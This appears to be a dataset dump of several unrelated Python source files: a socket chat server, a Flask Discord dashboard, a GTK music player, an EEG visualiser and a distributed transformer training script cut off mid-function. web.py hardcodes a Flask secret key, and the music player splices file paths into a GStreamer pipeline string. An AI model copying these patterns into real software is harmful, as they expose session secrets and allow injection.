source
stringlengths
3
86
python
stringlengths
75
1.04M
multi.py
import socket import os from threading import * Server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "localhost" port = 12345 seprator_token = "<NEP>" disconectMessage ="!DISCONNECT" threadCount = 0 clientSockets = set() nameaccess={} Server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: Server.bind((host, port)) except socket.error as e: print(str(e)) print("Server Listening on port " + str(port)) Server.listen(5) def ServerListner(cs): while True: try: msg = cs.recv(1024).decode() except Exception as e: print(f"Error: {e}") cs.close() break # clientSockets.remove(cs) else: if msg == disconectMessage: cs.close() break msg = msg.replace(seprator_token, ": ") print(msg) counter=0 finname='' while msg[counter]!=':': finname+=msg[counter] counter+=1 counter+=2 namestr='' counter2=0 underscorePresent=0 while counter2<len(msg): if msg[counter2]=='_': underscorePresent=1 break counter2+=1 if underscorePresent==0: namestr="all" else: while msg[counter]!=' ': namestr+=msg[counter] counter+=1 names=[] temp='' print(namestr) msg2='' while counter<len(msg): msg2+=msg[counter] counter+=1 for letter in namestr: if letter!='_': temp+=letter else: if temp=='all': names=clientSockets break if temp not in nameaccess.keys(): print('mentioned user not present') continue names.append(nameaccess[temp]) temp='' msg=finname+': '+msg2 if(len(names)==0): names=clientSockets for client_socket in names: if client_socket not in clientSockets: print(f"{client_socket} has been terminated, can't send message") continue try: client_socket.send(msg.encode()) except socket.error as e: client_socket.close() clientSockets.remove(client_socket) clientSockets.remove(cs) while True: cs, caddr = Server.accept() print(f"[+] {caddr} connected to server.") clientSockets.add(cs) print(f"Total active connections: {len(clientSockets)}") welcome = f"Thanks for Connecting to the server {caddr}" cs.send(welcome.encode()) usname = cs.recv(1024).decode() print(usname) nameaccess[usname]=cs t = Thread(target=ServerListner, args=(cs,)) t.daemon = True t.start() for cs in clientSockets: cs.close() Server.close()
web.py
#Dashboard under testing , Solve unauthorized for discord api error from http import server from threading import Thread from shutil import ExecError from django.shortcuts import render from flask import * import flask from oauth import Oauth from dotenv import load_dotenv import os import pymongo from pymongo import MongoClient load_dotenv() # Creating and Configuring the app app = Flask(__name__) app.config['SECRET_KEY'] = b"%\xe0'\x01\xdeH\x8e\x85m|\xb3\xffCN\xc9g" # Intilize Database db_url = os.environ['tst'] cluster = MongoClient(db_url) database = cluster["Jarvis"] welcome_collection = database["welcome"] leave_collection = database["leave"] basedb = database['flaskapp'] # Server @app.route('/') def home(): return render_template('index.html') @app.route('/oauth/discord') def oauth(): # Authorization code = request.args.get("code") token = Oauth.get_access_token(code) session['token'] = token return redirect('/dashboard') @app.route('/dashboard') def dashboard(): if 'token' not in session: return redirect("https://discord.com/api/oauth2/authorize?client_id=916630347746250782&redirect_uri=https%3A%2F%2Ftessarect.prakarsh17.senarc.org%2F&response_type=code&scope=identify") user_data = Oauth.get_user_json(session.get('token')) user_guilds_data = Oauth.get_user_guild(session.get('token')) bot_guilds = Oauth.get_bot_guilds() mutual_bot_guilds = Oauth.get_mutual_guilds(user_guilds_data, bot_guilds) return render_template('dashboard.html', guilds=mutual_bot_guilds, userdata=user_data) @app.route('/guild/guild_id=<guild_id>') def guild(guild_id: int): user_data = Oauth.get_user_json(session.get('token')) guild_info = Oauth.get_guild_data(guild_id, session.get('token')) channels = Oauth.get_channel_from_guild(guild_id) if not guild_info: return redirect('/dashboard') return render_template('guilds.html', guild=guild_info, userdata=user_data, channel=channels) @app.route("/forward/<guild_id>", methods=['POST']) def move(guild_id:int): try: user_data = Oauth.get_user_json(session.get('token')) guild_info = Oauth.get_guild_data(guild_id, session.get('token')) channels = Oauth.get_channel_from_guild(guild_id) return render_template('update.html', guild=guild_info) except Exception as e: print(e) def run(): app.run(host='0.0.0.0', port=8080) def keep_alive(): t = Thread(target=run) t.start()
logout.py
""" Quit a shell. """ import argparse _stash = globals()["_stash"] def logout(n): """ Quit StaSh :param n: exitcode for the shell (not implemented) :type n: int """ import threading t = threading.Thread(target=_stash.close, name="close thread") t.daemon = True t.start() if __name__ == "__main__": parser = argparse.ArgumentParser(description="Quits a shell") parser.add_argument("n", nargs="?", default=0, type=int, help="exit the shell with this code. Not implemented.") ns = parser.parse_args() logout(ns.n)
microframework.py
#!/usr/bin/env python3 import time import threading import json class PereodicTask: """Repeat procedure/function in background (thread) with interval Args: task (obj): procedure/function to repeat interval (int): interval in seconds (default 1) """ def __init__(self, task, interval=1): self.interval = interval self.task = task self.thread = threading.Thread(target=self._procedure, args=()) self.thread.daemon = True self.thread.start() def _procedure(self): while True: self.task() time.sleep(self.interval) def stop(self): """Stop execution and delete thread""" del self class JSONDB: """Load JSON file and use it as database (key: value) Args: filename (str): filename of DB, example: names.json rw (bool): defines if DB writable or read-only """ def __init__(self, filename, rw=True): self.filename = filename self.rw = rw self.load() def load(self): """Parse JSON and load to memory""" with open(self.filename, 'r') as f: self.json_array = json.loads(f.read()) def save(self): """Save modified DB to file""" if not self.rw: return False with open(self.filename, 'w') as f: json.dump(self.json_array, f, sort_keys=True, indent=4) return True def get(self, option): """Get value from loaded DB""" return self.json_array[option] def update(self, option, new_value): """Change option value. Need save() to save to disk""" self.json_array[option] = new_value
realtime.py
import mne import time import threading from .._handlers import properties from abc import ABC, abstractmethod class RealtimeError(Exception): pass class Realtime(ABC): """Realtime abstract class """ def __init__(self, options): self.channels = options["channels"] self.fs = options["fs"] @abstractmethod def start(self): pass @abstractmethod def stop(self): pass @abstractmethod def send_data(self, eeg): pass realtime_strategies = {} qlock = threading.Lock() def _visualize(acq, data, minimum_time=None): qlock.acquire() acq.show_realtime_data(data, minimum_time) qlock.release() def register_realtime(cls): """ register a new strategy to realtime dictionary This function was made to be used as decorator on subclass of bcpy.realtimevisualization.Realtime Parameters ---------- - cls : subclass of bcpy.realtimevisualization.Realtime subclass that will be register as an avaliable strategy Returns ------- - subclass of bcpy.realtimevisualization.Realtime class passed on parameter Raises ------ - RealtimeError raises when the class is already register on dictionary """ if (cls.__name__ in realtime_strategies): raise RealtimeError( "Realtime strategy" + cls.__name__ + "already register in realtime_strategies") realtime_strategies[cls.__name__] = cls return cls def realtimevisualization(r, dataIter, options): """Send data to GUI Parameters ---------- - dataIter: `str` or `Realtime` Strategy to send data Returns ------- - data: `generator` of `[n_channels]` """ props = properties.Properties() print(1) if isinstance(r, str): if not (r in realtime_strategies): raise RealtimeError("Unknown realtime strategy {r}".format(r=r)) # TODO: Sync this acq = realtime_strategies[r](options) time.sleep(0.5) acq.start() props.realtime_inst = acq intersec = options["intersection"] - \ 1 if "intersection" in options else 0 data = next(dataIter) yield(data) if (isinstance(data, mne.io.RawArray)): data = data.get_data().T threading.Thread(target=_visualize, args=( acq, data)).start() while True: time_start = time.time() data = next(dataIter) time_final = time.time() time_to_pull_data = time_final - time_start yield(data) if (isinstance(data, mne.io.RawArray)): data = data.get_data().T data_to_send = data[intersec:] threading.Thread(target=_visualize, args=( acq, data_to_send, time_to_pull_data)).start() elif isinstance(r, Realtime): acq = r props.realtime_inst = acq while True: data = next(dataIter) yield(data) threading.Thread(target=_visualize, args=(acq, data)).start()
main_window_controller.py
import os import os.path import threading import time #imports the DAO from music_wave.data_manager import DataManager #imports the miner from music_wave.miner import Miner #imports the compiler for searchs inside the program from music_wave.search_compiler import SearchCompiler #imports rola class from music_wave.rola import Rola #imports tag window controller from music_wave.tag_window_controller import TagWindowController from music_wave.rola import Rola #imports album window controller from music_wave.album_window_controller import AlbumWindowController #imports album window controller from music_wave.performer_window_controller import PerformerWindowController import gi gi.require_version('Gtk', '3.0') gi.require_version('Gst', '1.0') #import Gtk, GLib, GdkPixbuf, Gstreamer modules from gi.repository import Gtk, GdkPixbuf, Gst, GLib #imports mutagen module import mutagen #imports ID3 tags module from mutagen from mutagen.id3 import ID3 class MainWindowController: #Global list for rolas representation data_list = [] #Main Window Controller constructor def __init__(self): self.first_run = True self.read_from_database_activated = False home = os.getenv("HOME") path = str(home + "/Music") self.miner = Miner(path) self.data_manager = DataManager("", "rolas.db") self.search_compiler = SearchCompiler() self.rolas_representation = [] self.music_player = [] self.music_player.append(None) self.music_player.append(False) self.music_player.append("") self.tag_window_controller = TagWindowController() self.album_window_controller = AlbumWindowController() self.performer_window_controller = PerformerWindowController() self.performer_window_controller.start() self.builder = Gtk.Builder() self.builder.add_from_file("resources/main.glade") self.main_window = self.builder.get_object("main_window") self.liststore = self.builder.get_object("liststore") self.filter = self.liststore.filter_new() self.treeview = self.builder.get_object("treeview") self.treeview.set_model(self.filter) self.title_label = self.builder.get_object("title_label") self.album_label = self.builder.get_object("album_label") self.performer_label = self.builder.get_object("performer_label") self.imageview = self.builder.get_object("imageview") self.searchentry = self.builder.get_object("searchentry") loading_builder = Gtk.Builder() loading_builder.add_from_file("resources/loading.glade") self.loading_window = loading_builder.get_object("loading_window") self.loading_label = loading_builder.get_object("loading_label") about_builder = Gtk.Builder() about_builder.add_from_file("resources/about.glade") self.about_window = about_builder.get_object("about_window") tag_builder = Gtk.Builder() tag_builder.add_from_file("resources/tag.glade") self.columns = ["Title", "Album", "Performer", "Genre", "Path", 0] handlers = { "exit": Gtk.main_quit, "mine": (self.on_load_button_clicked), "about": (lambda widget : self.about_window.show()), "tag": (lambda widget : self.trigger_tag_window()), "album": (lambda widget : self.trigger_album_window()), "performer": (lambda widget : self.trigger_performer_window()), "search" : (self.on_search_entry_activated) } self.builder.connect_signals(handlers) self.tree_selection = self.treeview.get_selection() self.tree_selection.set_mode(Gtk.SelectionMode.SINGLE) self.tree_selection.connect("changed", self.on_selected_row) play_button = self.builder.get_object("play_button") play_button.connect("clicked", self.play_song) pause_button = self.builder.get_object("pause_button") pause_button.connect("clicked", self.pause_song) self.shown_rows = [] def search_filter_func(self, model, iter, data): if self.shown_rows == [] : return True else: return model[iter][5] in self.shown_rows #Method that hides an specific window received as argument def hide_window(self, window, event): window.hide() return True # Method that plays a song using Gstreamer def play_song(self, caller): try: (model, iter) = self.tree_selection.get_selected() path = model.get_value(iter,4) except: return if self.music_player[1] == False or self.music_player[2] != path: self.music_player[2] = path path = path.replace(" ", "\ ") if self.music_player[0] != None: self.music_player[0].set_state(Gst.State.NULL) pipeline = "filesrc location=" + path + \ " ! decodebin ! audioconvert ! autoaudiosink" player = Gst.parse_launch(pipeline) self.music_player[0] = player player.set_state(Gst.State.PLAYING) self.music_player[1] = True else : self.music_player[0].set_state(Gst.State.PLAYING) # Method that pauses a song using Gstreamer def pause_song(self, caller): try: player = self.music_player[0] player.set_state(Gst.State.PAUSED) except: pass #Loads the music library when the "load" button is clicked def on_load_button_clicked(self, caller): if os.path.isfile("rolas.db"): os.remove("rolas.db") self.run_load_music_task(self.loading_window) else : self.run_load_music_task(self.loading_window) #Loads the music library when the "load" button is clicked def on_search_entry_activated(self, caller): search = self.searchentry.get_text() if search == "": self.shown_rows = [] self.filter.refilter() else: command = self.search_compiler.compile(search) identifiers = self.data_manager.execute_and_get_ids(command) self.shown_rows = identifiers self.filter.refilter() self.searchentry.set_text("") # Gets the music information, while shows an loading window def run_load_music_task(self, loading_window): loading_window.show() def thread_run(): fetch_info = self.fetch_info() GLib.idle_add(cleanup, fetch_info) def cleanup(fetch_info): loading_window.hide() thread.join() rolas_representation_list = fetch_info listmodel = Gtk.ListStore(str, str, str, str, str, int) for item in rolas_representation_list : listmodel.append(item) self.filter = listmodel.filter_new() self.filter.set_visible_func(self.search_filter_func) self.treeview.set_model(self.filter) #for row in self.filter: # row[2] = "alb" thread = threading.Thread(target = thread_run) thread.start() # Retrieves the music info either only from the database or from both # the database and the miner object. def fetch_info(self): if self.read_from_database_activated: self.read_from_database_activated = False else : self.data_manager.create_database() self.mine() self.data_manager.populate_database(rolas = self.rolas , performers = self.performers, albums = self.albums) db_rolas = self.data_manager.get_rolas() db_albums = self.data_manager.get_albums() db_performers = self.data_manager.get_performers() rolas_representation = [] for rola in db_rolas.values(): representation = [] representation.append(rola.get_title().replace("´", "'")) representation.append( self.data_manager.get_album(rola.get_album_id())[2]) representation.append( self.data_manager.get_performer(rola.get_performer_id())[2]) representation.append(rola.get_genre()) representation.append(rola.get_path()) representation.append(rola.get_id()) rolas_representation.append(representation) if self.first_run: self.data_list = rolas_representation else: return rolas_representation # Mines from the Music directory, and updates the loading window label # to show the actual progress def mine(self): def set_label_text(text): self.loading_label.set_text(text) self.miner.setup() self.miner.walk() for path in self.miner.get_paths(): self.miner.mine(path) GLib.idle_add(set_label_text, (str(self.miner.get_processed_files()) + " / " + str(self.miner.get_total_files()) )) GLib.idle_add(set_label_text, "Loading music ...") self.rolas = self.miner.get_rolas() self.albums = self.miner.get_albums() self.performers = self.miner.get_performers() #Responds to a selected row signal in TreeView. def on_selected_row(self, caller) : try: (model, iter) = self.tree_selection.get_selected() title = model.get_value(iter,0) album = model.get_value(iter,1) performer = model.get_value(iter,2) path = model.get_value(iter,4) self.title_label.set_text(title) self.album_label.set_text(album) self.performer_label.set_text(performer) audio = ID3(path) file = mutagen.File(path) tags = mutagen.mp3.Open(path) except : return try: artwork_data = file.tags['APIC:'].data loader = GdkPixbuf.PixbufLoader.new() loader.set_size(120, 120) loader.write(artwork_data) loader.close() pixbuf = loader.get_pixbuf() self.imageview.set_from_pixbuf(pixbuf) except: try: artwork_exists = False for tag in tags: if tag.startswith("APIC"): artwork_data = tags[tag].data artwork_exists = True break if artwork_exists: loader = GdkPixbuf.PixbufLoader.new() loader.set_size(120, 120) loader.write(artwork_data) loader.close() pixbuf = loader.get_pixbuf() self.imageview.set_from_pixbuf(pixbuf) else: self.imageview.set_from_file("resources/music.png") except: self.imageview.set_from_file("resources/music.png") #Launches an tag editro window, with the selected row info from the treeview def trigger_tag_window(self): try: (model, iter) = self.tree_selection.get_selected() album = model.get_value(iter, 1) performer = model.get_value(iter, 2) path = model.get_value(iter, 4) id = model.get_value(iter,5) except : return rola = self.data_manager.get_rola(id) self.tag_window_controller.set_id(id) self.tag_window_controller.set_album(album) self.tag_window_controller.set_performer(performer) self.tag_window_controller.set_path(path) title = rola[4] track = str(rola[5]) year = str(rola[6]) genre = rola[7] self.tag_window_controller.set_treemodel(model) self.tag_window_controller.set_treeiter(iter) self.tag_window_controller.set_title_entry_text(title) self.tag_window_controller.set_track_entry_text(track) self.tag_window_controller.set_year_entry_text(year) self.tag_window_controller.set_genre_entry_text(genre) self.tag_window_controller.show_window() #self.tag_window_controller.set_lambda(lambda : self.run_load_music_task(self.loading_window)) #Launches an tag editro window, with the selected row info from the treeview def trigger_album_window(self): try: (model, iter) = self.tree_selection.get_selected() album_name = model.get_value(iter, 1) except : return id = model.get_value(iter,5) rola = self.data_manager.get_rola(id) album_id = rola[2] self.album_window_controller.set_id(album_id) self.album_window_controller.set_old_name(album_name) album = self.data_manager.get_album(album_id) name = album[2] year = album[3] self.album_window_controller.set_filter(self.filter) self.album_window_controller.set_name_entry_text(name) self.album_window_controller.set_year_entry_text(str(year)) self.album_window_controller.show_window() #Launches an tag editro window, with the selected row info from the treeview def trigger_performer_window(self): try: (model, iter) = self.tree_selection.get_selected() performer_name = model.get_value(iter, 2) except: return id = model.get_value(iter,5) rola = self.data_manager.get_rola(id) performer_id = rola[1] self.performer_window_controller.set_id(performer_id) self.performer_window_controller.set_old_name(performer_name) performer = self.data_manager.get_performer(performer_id) type = performer[1] name = performer[2] self.performer_window_controller.set_filter(self.filter) self.performer_window_controller.clear_entries() if type == 0: self.performer_window_controller.set_type("Person") person = self.data_manager.get_person(name) self.performer_window_controller.set_stage_entry_text(person[1]) self.performer_window_controller.set_real_entry_text(person[2]) self.performer_window_controller.set_birth_entry_text(person[3]) self.performer_window_controller.set_death_entry_text(person[4]) elif type == 1: self.performer_window_controller.set_type("Group") group = self.data_manager.get_group(name) self.performer_window_controller.set_name_entry_text(group[1]) self.performer_window_controller.set_start_entry_text(group[2]) self.performer_window_controller.set_end_entry_text(group[3]) elif type == 2: self.performer_window_controller.set_type("Unknown") self.performer_window_controller.set_name_entry_text(name) self.performer_window_controller.show_window() #Starts the Main Window Controller object. def start(self): Gst.init(None) self.mine() self.main_window.show_all() #Fills the database if os.path.isfile("rolas.db"): self.read_from_database_activated = True self.run_load_music_task(self.loading_window) else : self.run_load_music_task(self.loading_window) self.first_run = False self.about_window.connect("delete-event", self.hide_window) self.about_window.connect("destroy", self.hide_window) for representation in self.data_list: self.liststore.append(representation) for index, column in enumerate(self.columns): # cellrenderer to render the text cell = Gtk.CellRendererText() # the column is created col = Gtk.TreeViewColumn(column, cell, text=index) # and it is appended to the treeview if column == "Path" or column == 0: col.set_visible(False) self.treeview.append_column(col)
train_fr_dist_randomseed.py
# coding: utf-8 import argparse import time import math import os, sys import itertools import numpy as np import torch import torch.nn as nn import torch.optim as optim from data_utils import get_lm_corpus from mem_transformer_fr_randomseed import MemTransformerLM_fr from utils.exp_utils import create_exp_dir from utils.data_parallel import BalancedDataParallel from torch.autograd import Variable from sharedtensor import SharedTensor import multiprocessing as mp GPUS = [0, 1, 2, 3] torch.backends.cudnn.deterministic = True def main(args, logging): device = torch.device('cuda' if args.cuda else 'cpu') ############################################################################### # Load data ############################################################################### corpus = get_lm_corpus(args.data, args.dataset) ntokens = len(corpus.vocab) args.n_token = ntokens eval_batch_size = 10 tr_iter = corpus.get_iterator('train', args.batch_size, args.tgt_len, device=device, ext_len=args.ext_len) va_iter = corpus.get_iterator('valid', eval_batch_size, args.eval_tgt_len, device=device, ext_len=args.ext_len) te_iter = corpus.get_iterator('test', eval_batch_size, args.eval_tgt_len, device=device, ext_len=args.ext_len) # adaptive softmax / embedding cutoffs, tie_projs = [], [False] if args.adaptive: assert args.dataset in ['wt103', 'lm1b'] if args.dataset == 'wt103': cutoffs = [20000, 40000, 200000] tie_projs += [True] * len(cutoffs) elif args.dataset == 'lm1b': cutoffs = [60000, 100000, 640000] tie_projs += [False] * len(cutoffs) ############################################################################### # Build the model ############################################################################### def init_weight(weight): if args.init == 'uniform': nn.init.uniform_(weight, -args.init_range, args.init_range) elif args.init == 'normal': nn.init.normal_(weight, 0.0, args.init_std) def init_bias(bias): nn.init.constant_(bias, 0.0) def weights_init(m): classname = m.__class__.__name__ if classname.find('Linear') != -1: if hasattr(m, 'weight') and m.weight is not None: init_weight(m.weight) if hasattr(m, 'bias') and m.bias is not None: init_bias(m.bias) elif classname.find('AdaptiveEmbedding') != -1: if hasattr(m, 'emb_projs'): for i in range(len(m.emb_projs)): if m.emb_projs[i] is not None: nn.init.normal_(m.emb_projs[i], 0.0, args.proj_init_std) elif classname.find('Embedding') != -1: if hasattr(m, 'weight'): init_weight(m.weight) elif classname.find('ProjectedAdaptiveLogSoftmax') != -1: if hasattr(m, 'cluster_weight') and m.cluster_weight is not None: init_weight(m.cluster_weight) if hasattr(m, 'cluster_bias') and m.cluster_bias is not None: init_bias(m.cluster_bias) if hasattr(m, 'out_projs'): for i in range(len(m.out_projs)): if m.out_projs[i] is not None: nn.init.normal_(m.out_projs[i], 0.0, args.proj_init_std) elif classname.find('LayerNorm') != -1: if hasattr(m, 'weight'): nn.init.normal_(m.weight, 1.0, args.init_std) if hasattr(m, 'bias') and m.bias is not None: init_bias(m.bias) elif classname.find('TransformerLM') != -1 or classname.find('TransformerLM_fr_begin_end') != -1 or classname.find('TransformerLM_fr_mid') != -1: if hasattr(m, 'r_emb'): init_weight(m.r_emb) if hasattr(m, 'r_w_bias'): init_weight(m.r_w_bias) if hasattr(m, 'r_r_bias'): init_weight(m.r_r_bias) if hasattr(m, 'r_bias'): init_bias(m.r_bias) def update_dropout(m): classname = m.__class__.__name__ if classname.find('Dropout') != -1: if hasattr(m, 'p'): m.p = args.dropout def update_dropatt(m): if hasattr(m, 'dropatt'): m.dropatt.p = args.dropatt models = MemTransformerLM_fr(args.num_splits, ntokens, args.n_layer, args.n_head, args.d_model, args.d_head, args.d_inner, args.dropout, args.dropatt, tie_weight=args.tied, d_embed=args.d_embed, div_val=args.div_val, tie_projs=tie_projs, pre_lnorm=args.pre_lnorm, tgt_len=args.tgt_len, ext_len=args.ext_len, mem_len=args.mem_len, cutoffs=cutoffs, same_length=args.same_length, attn_type=args.attn_type, clamp_len=args.clamp_len, sample_softmax=args.sample_softmax) for i, model in enumerate(models): model.apply(weights_init) if i == 0: model.word_emb.apply(weights_init) # ensure embedding init is not overridden by out_layer in case of weight sharing args.n_all_param = 0 args.n_nonemb_param = 0 for i in range(len(models)): args.n_all_param += sum([p.nelement() for p in models[i].parameters()]) if i == 0: args.n_nonemb_param += sum([p.nelement() for p in models[i].layers_begin.parameters()]) args.n_nonemb_param += sum([p.nelement() for p in models[i].layers_end.parameters()]) else: args.n_nonemb_param += sum([p.nelement() for p in models[i].layers.parameters()]) #### optimizer if args.optim.lower() == 'sgd': if args.sample_softmax > 0: assert args.sample_softmax>0, 'not implemented yet!' else: optimizers = [] for model in models: optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.mom) optimizers.append(optimizer) if args.optim.lower() == 'adam': if args.sample_softmax > 0: assert args.sample_softmax>0, 'not implemented yet!' else: optimizers = [] for model in models: optimizer = optim.Adam(model.parameters(), lr=args.lr) optimizers.append(optimizer) #### scheduler if args.scheduler == 'cosine': # here we do not set eta_min to lr_min to be backward compatible # because in previous versions eta_min is default to 0 # rather than the default value of lr_min 1e-6 schedulers = [] for optimizer in optimizers: scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, args.max_step, eta_min=args.eta_min) # should use eta_min arg schedulers.append(scheduler) if args.sample_softmax > 0: scheduler_sparse = optim.lr_scheduler.CosineAnnealingLR(optimizer_sparse, args.max_step, eta_min=args.eta_min) # should use eta_min arg elif args.scheduler == 'inv_sqrt': # originally used for Transformer (in Attention is all you need) def lr_lambda(step): # return a multiplier instead of a learning rate if step == 0 and args.warmup_step == 0: return 1. else: return 1. / (step ** 0.5) if step > args.warmup_step \ else step / (args.warmup_step ** 1.5) scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lr_lambda) elif args.scheduler == 'dev_perf': scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=args.decay_rate, patience=args.patience, min_lr=args.lr_min) if args.sample_softmax > 0: scheduler_sparse = optim.lr_scheduler.ReduceLROnPlateau(optimizer_sparse, factor=args.decay_rate, patience=args.patience, min_lr=args.lr_min) elif args.scheduler == 'constant': pass logging('=' * 100) for k, v in args.__dict__.items(): logging(' - {} : {}'.format(k, v)) logging('=' * 100) logging('#params = {}'.format(args.n_all_param)) logging('#non emb params = {}'.format(args.n_nonemb_param)) ############################################################################### # Training code ############################################################################### shm_lists = [] shape = [args.tgt_len, args.batch_size, args.d_model] for i in range(args.num_splits): shm_data = SharedTensor(shape) shm_grad = SharedTensor(shape) shm_lists.append(shm_data) shm_lists.append(shm_grad) # eval shm_lists shm_lists_eval = [] shape = [args.eval_tgt_len, eval_batch_size, args.d_model] for i in range(args.num_splits): shm_data = SharedTensor(shape) shm_grad = SharedTensor(shape) shm_lists_eval.append(shm_data) shm_lists_eval.append(shm_grad) # Loop over epochs. processes = [] for i in range(args.num_splits): if i == 0: p = mp.Process(target=train_begin_end, args=(models[i], optimizers[i], tr_iter, va_iter, shm_lists, shm_lists_eval, i, schedulers[i], logging, args)) else: p = mp.Process(target=train_mid, args=(models[i], optimizers[i], tr_iter.n_batch, va_iter.n_batch, shm_lists, shm_lists_eval, i, schedulers[i], args)) p.start() processes.append(p) for p in processes: p.join() def train_mid(model, optimizer, n_batch, n_batch_val, shm_lists, shm_lists_eval, split_id, scheduler, args): model.cuda(GPUS[split_id]) train_step = 0 # Turn on training mode which enables dropout. for epoch in itertools.count(start=1): model.train() mems = tuple() #for batch, (data, target, seq_len) in enumerate(train_iter): for batch in range(n_batch): model.zero_grad() # forward hidden = shm_lists[2*(split_id-1)].recv() #print(split_id, ' get hidden from ', 2*(split_id-1) , hidden.norm()) if args.cuda: hidden = hidden.cuda(GPUS[split_id]) hidden = Variable(hidden.data) with torch.no_grad(): ret = model.forward(hidden, *mems) hidden, mems = ret[0], ret[1:] shm_lists[2*split_id].send(hidden.data.cpu()) #print(split_id, ' sent hidden to ', 2*(split_id) , hidden.norm()) # backward model.fr_backward() if model.delay < 0: grad = model.get_grad() shm_lists[2*(split_id-1)+1].send(grad.cpu()) #print(split_id, ' sent grad to ', 2*(split_id-1)+1 , grad.norm()) torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip) optimizer.step() # receive and save grad if model.delay <= 0: grad = shm_lists[2*split_id+1].recv() if args.cuda: grad = grad.cuda(GPUS[split_id]) model.save_grad(grad) #print(split_id, ' receive grad from ', 2*(split_id)+1 , grad.norm()) # step-wise learning rate annealing train_step += 1 if args.scheduler in ['cosine', 'constant', 'dev_perf']: # linear warmup stage if train_step < args.warmup_step: curr_lr = args.lr * train_step / args.warmup_step optimizer.param_groups[0]['lr'] = curr_lr else: if args.scheduler == 'cosine': scheduler.step(train_step) elif args.scheduler == 'inv_sqrt': scheduler.step(train_step) if train_step % args.eval_interval == 0: model.eval() # If the model does not use memory at all, make the ext_len longer. # Otherwise, make the mem_len longer and keep the ext_len the same. if args.mem_len == 0: model.reset_length(args.eval_tgt_len, args.ext_len+args.tgt_len-args.eval_tgt_len, args.mem_len) else: model.reset_length(args.eval_tgt_len, args.ext_len, args.mem_len+args.tgt_len-args.eval_tgt_len) mems_eval = tuple() with torch.no_grad(): for batch in range(n_batch_val): # forward hidden = shm_lists_eval[2*(split_id-1)].recv() if args.cuda: hidden = hidden.cuda(GPUS[split_id]) hidden = Variable(hidden.data) ret = model.forward(hidden, *mems_eval) hidden, mems_eval = ret[0], ret[1:] shm_lists_eval[2*split_id].send(hidden.data.cpu()) # Switch back to the training mode model.reset_length(args.tgt_len, args.ext_len, args.mem_len) model.train() if train_step == args.max_step: break if train_step == args.max_step: break def train_begin_end(model, optimizer, tr_iter, va_iter, shm_lists, shm_lists_eval, split_id, scheduler, logging, args): model.cuda(GPUS[0]) # Turn on training mode which enables dropout. log_start_time = time.time() eval_start_time = time.time() train_step = 0 train_loss = 0 best_val_loss = None val_loss = 0 for epoch in itertools.count(start=1): model.train() mems_begin = tuple() mems_end = tuple() train_iter = tr_iter.get_varlen_iter() if args.varlen else tr_iter for batch, (data, target, seq_len) in enumerate(train_iter): if seq_len > args.tgt_len: data = data[0:args.tgt_len] target = target[0:args.tgt_len] else: while len(data) != args.tgt_len: data_copy_len = (args.tgt_len - len(data)) if (args.tgt_len - len(data) <= len(data)) else len(data) data = torch.cat([data, data[0:data_copy_len]], 0) target = torch.cat([target, target[0:data_copy_len]], 0) model.zero_grad() # forward begin with torch.no_grad(): ret = model.forward_begin(data, *mems_begin) hidden, mems_begin = ret[0], ret[1:] shm_lists[split_id*2].send(hidden.data.cpu()) #print(0, ' sent hidden to ', 2*(split_id) , hidden.norm()) # forward end hidden_end = shm_lists[2*(args.num_splits-1)].recv() if args.cuda: hidden = hidden_end.cuda(GPUS[0]) #print(args.num_splits, ' receive hidden from ', 2*(args.num_splits-1) , hidden.norm()) # backward end model.fr_backward_begin() hidden = Variable(hidden.data, requires_grad=True) ret = model.forward_end(hidden, target, *mems_end) loss, mems_end = ret[0], ret[1:] loss = loss.float().mean().type_as(loss) # backward end loss.backward() grad = model.get_grad_end() #shm_lists[2*(args.num_splits-1)+1].send(grad.cpu()) shm_lists[2*(args.num_splits-1)+1].send(hidden.grad.data.cpu()) #print(args.num_splits, ' send grad to ', 2*(args.num_splits-1)+1 , grad.norm()) train_loss += loss.float().item() torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip) optimizer.step() # receive and save grad if model.delay <= 0: grad = shm_lists[1].recv() if args.cuda: grad = grad.cuda(GPUS[0]) model.save_grad_begin(grad) #print(0, ' receive grad from ', 1 , grad.norm()) # step-wise learning rate annealing train_step += 1 if args.scheduler in ['cosine', 'constant', 'dev_perf']: # linear warmup stage if train_step < args.warmup_step: curr_lr = args.lr * train_step / args.warmup_step optimizer.param_groups[0]['lr'] = curr_lr else: if args.scheduler == 'cosine': scheduler.step(train_step) elif args.scheduler == 'inv_sqrt': scheduler.step(train_step) if train_step % args.log_interval == 0: cur_loss = train_loss / args.log_interval elapsed = time.time() - log_start_time log_str = '| epoch {:3d} step {:>8d} | {:>6d} batches | lr {:.3g} ' \ '| ms/batch {:5.2f} | loss {:5.2f}'.format( epoch, train_step, batch+1, optimizer.param_groups[0]['lr'], elapsed * 1000 / args.log_interval, cur_loss) if args.dataset in ['enwik8', 'text8']: log_str += ' | bpc {:9.5f}'.format(cur_loss / math.log(2)) else: log_str += ' | ppl {:9.3f}'.format(math.exp(cur_loss)) logging(log_str) train_loss = 0 log_start_time = time.time() if train_step % args.eval_interval == 0: model.eval() # If the model does not use memory at all, make the ext_len longer. # Otherwise, make the mem_len longer and keep the ext_len the same. if args.mem_len == 0: model.reset_length(args.eval_tgt_len, args.ext_len+args.tgt_len-args.eval_tgt_len, args.mem_len) else: model.reset_length(args.eval_tgt_len, args.ext_len, args.mem_len+args.tgt_len-args.eval_tgt_len) mems_begin_eval = tuple() mems_end_eval = tuple() # Evaluation total_len, total_loss = 0, 0. with torch.no_grad(): for i, (data, target, seq_len) in enumerate(va_iter): if args.max_eval_steps > 0 and i >= args.max_eval_steps: break if seq_len > args.eval_tgt_len: data = data[0:args.eval_tgt_len] target = target[0:args.eval_tgt_len] else: while len(data) != args.eval_tgt_len: data_copy_len = (args.eval_tgt_len - len(data)) if (args.eval_tgt_len - len(data) <= len(data)) else len(data) data = torch.cat([data, data[0:data_copy_len]], 0) target = torch.cat([target, target[0:data_copy_len]], 0) ret = model.forward_begin(data, *mems_begin_eval) hidden, mems_begin_eval = ret[0], ret[1:] shm_lists_eval[split_id*2].send(hidden.data.cpu()) # forward end hidden_end = shm_lists_eval[2*(args.num_splits-1)].recv() if args.cuda: 